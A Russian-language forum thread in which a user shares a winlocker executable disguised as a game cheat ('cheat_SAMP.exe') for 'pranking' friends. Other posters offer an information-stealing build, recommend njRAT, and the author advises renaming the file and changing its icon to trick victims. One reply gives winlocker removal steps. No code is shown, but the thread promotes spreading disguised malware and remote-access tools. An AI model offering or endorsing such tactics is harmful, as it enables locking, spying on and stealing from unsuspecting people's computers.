Винлокер(розыгрыш)

Собираетесь когото пранкануть?

  • Да

    Голосов: 16 61.5%
  • Нет

    Голосов: 9 34.6%
  • Я хз лол

    Голосов: 7 26.9%

  • Всего проголосовало
    26

Nikita_Sherbakov

Потрачен
Автор темы
14
3
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Этот файл евляется винлокером для пранка друга пароль 228(если не работает пишите мне в личку или по почте указаной в винлокере)
Внимание! Не рекомендуется запускать этот файл на основной машине лучше на виртуальной! Иначе вы можете потерять важные файлы и винду!
Так что не пытайтесь проверить это на своей машине(ПК)!
 

Вложения

  • cheat_SAMP.exe
    397.5 KB · Просмотры: 1,491
  • Нравится
Реакции: Mr.Mastire222

LLIKOJIbHUK

Потрачен
1,139
570
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
С новым 2007 годом

Правда что-то не понял, в чем заключается розыгрыш, если по факту программа исполняет то, что должна, а не делает переадресацию на never gonna give you up
 

tunesidex

Известный
213
131
Ладно. Тогда пишите мне в лс, сделаем пранк над вашим другом, скинете ему мой билд. Правда он всю информацию украдёт, но если что-то надо будет вернуть, пишите мне в лс.
 

Mr.Mastire222

Известный
529
259
Чтобы обезвредить активный винколкер, нужно выключить ПК. Затем при включении долбить клавишу F8 и выбрать безопасный режим с поддержкой командной строки(так как некоторые выключают explorer в безопасном режиме) и если у вас нету проводника и интерфейса нужно написать в командную строку explorer.exe. Затем появится винда без винлокера. Для начала его нужно убрать из авто загрузок и того, что может его запустить автоматический. Затем удаляем файл вируса, если не удаляется, создаём такой вот .bat файл.
Пакетный файл майкрософт:
del *Имя .exe файла вируса*
// Запускать от имени администратора! Разместить в папку с exeшником.

Запускаем и наш вирус по сути должен обезвредится.
Согласен может работать не всегда но как способ.

Не балуйтесь с винлокером :) 😄


С новым 2007 годом

Правда что-то не понял, в чем заключается розыгрыш, если по факту программа исполняет то, что должна, а не делает переадресацию на never gonna give you up
Если разыгрывать друга по полной, то тут надо njRAT.

Этот файл евляется винлокером для пранка друга пароль 228(если не работает пишите мне в личку или по почте указаной в винлокере)
Внимание! Не рекомендуется запускать этот файл на основной машине лучше на виртуальной! Иначе вы можете потерять важные файлы и винду!
Так что не пытайтесь проверить это на своей машине(ПК)!
Там у меня на вертуалке, при перезагрузке пк запрашивалось разрешение на запуск этого приложения.
 
Последнее редактирование:
  • Нравится
Реакции: Nikita_Sherbakov

Nikita_Sherbakov

Потрачен
Автор темы
14
3
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Ладно. Тогда пишите мне в лс, сделаем пранк над вашим другом, скинете ему мой билд. Правда он всю информацию украдёт, но если что-то надо будет вернуть, пишите мне в лс.
Хм как всегда поевляются люди которые говорят что это их хоть это не так

С новым 2007 годом

Правда что-то не понял, в чем заключается розыгрыш, если по факту программа исполняет то, что должна, а не делает переадресацию на never gonna give you up
этот винлоке не крадёт файлы, а при заканчивании всех попыток(3) винда слитает в этом -
и этот винлокер не даёт времени на разблакировку как другие(в том смысле что там таймер есть а тут нет)

Чтобы обезвредить активный винколкер, нужно выключить ПК. Затем при включении долбить клавишу F8 и выбрать безопасный режим с поддержкой командной строки(так как некоторые выключают explorer в безопасном режиме) и если у вас нету проводника и интерфейса нужно написать в командную строку explorer.exe. Затем появится винда без винлокера. Для начала его нужно убрать из авто загрузок и того, что может его запустить автоматический. Затем удаляем файл вируса, если не удаляется, создаём такой вот .bat файл.
Пакетный файл майкрософт:
del *Имя .exe файла вируса*
// Запускать от имени администратора! Разместить в папку с exeшником.

Запускаем и наш вирус по сути должен обезвредится.
Согласен может работать не всегда но как способ.

Не балуйтесь с винлокером :) 😄



Если разыгрывать друга по полной, то тут надо njRAT.


Там у меня на вертуалке, при перезагрузке пк запрашивалось разрешение на запуск этого приложения.
Да можно ему курсок на х@й заменить и ошибки отправлять🤣
 
Последнее редактирование:
  • Вау
Реакции: LLIKOJIbHUK

Nikita_Sherbakov

Потрачен
Автор темы
14
3
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.

liptonxgod

Активный
366
88
Всех с 2013 годом! Уже давно ушла ера щас даже мамонт непроверяный exe файл не откроет от незнакомца та и друг врядли поведеться
 

Nikita_Sherbakov

Потрачен
Автор темы
14
3
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Всех с 2013 годом! Уже давно ушла ера щас даже мамонт непроверяный exe файл не откроет от незнакомца та и друг врядли поведеться
файл можно переиминовать, поменять иконку и т.д так что есть вероятнось что поведётся
 

DeKzer

Известный
518
220
Вопрос.
Нахер эта тема если можно скачать WinLocker builder?